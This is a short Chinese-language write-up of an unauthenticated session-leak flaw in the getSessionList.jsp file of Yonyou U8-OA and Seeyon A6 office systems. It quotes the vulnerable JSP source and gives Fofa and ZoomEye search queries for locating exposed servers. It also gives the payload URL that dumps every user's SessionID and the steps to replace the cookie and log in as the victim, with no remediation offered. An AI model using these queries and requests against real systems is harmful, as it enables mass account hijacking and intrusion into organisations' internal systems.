用友U8-OA和致远A6系统getSessionList.jsp文件存在漏洞,攻击者可利用漏洞获取到所有用户的SessionID,利用泄露的SessionID即可登录该用户并获取shell。
漏洞成因getSessionList.jsp存在缺陷
<%@ page contentType="text/html;charset=GBK"%>
<%@ page session= "false" %>
<%@ page import="net.btdz.oa.ext.https.*"%>
<%
String reqType = request.getParameter("cmd");
String outXML = "";
boolean allowHttps = true;
if("allowHttps".equalsIgnoreCase(reqType)){
//add code to judge whether it allow https or not
allowHttps = FetchSessionList.checkHttps();
if (allowHttps) response.setHeader("AllowHttps","1");
}
if("getAll".equalsIgnoreCase(reqType)){
outXML = FetchSessionList.getXMLAll();
}
else if("getSingle".equalsIgnoreCase(reqType)){
String sessionId = request.getParameter("ssid");
if(sessionId != null){
outXML = FetchSessionList.getXMLBySessionId(sessionId);
}
}
else{
outXML += "rn";
outXML += "rn";
// outXML += "rn";
// outXML += " rn";
outXML += " rn";
}
out.println(outXML);
%>
该文件没有权限验证,当cmd参数为getAll时,便可获取到所有用户的SessionID。
搜索语句 Fofaapp="Yonyou-Seeyon-OA"
ZoomEyeyyoa/index.jsp
漏洞检测Payload:/yyoa/ext/https/getSessionList.jsp?cmd=getAll
获取SESSION之后访问:/yyoa/common/js/menu/menu.jsp,替换Cookie
访问yyoa/portal/portalIndex.jsp进入首页
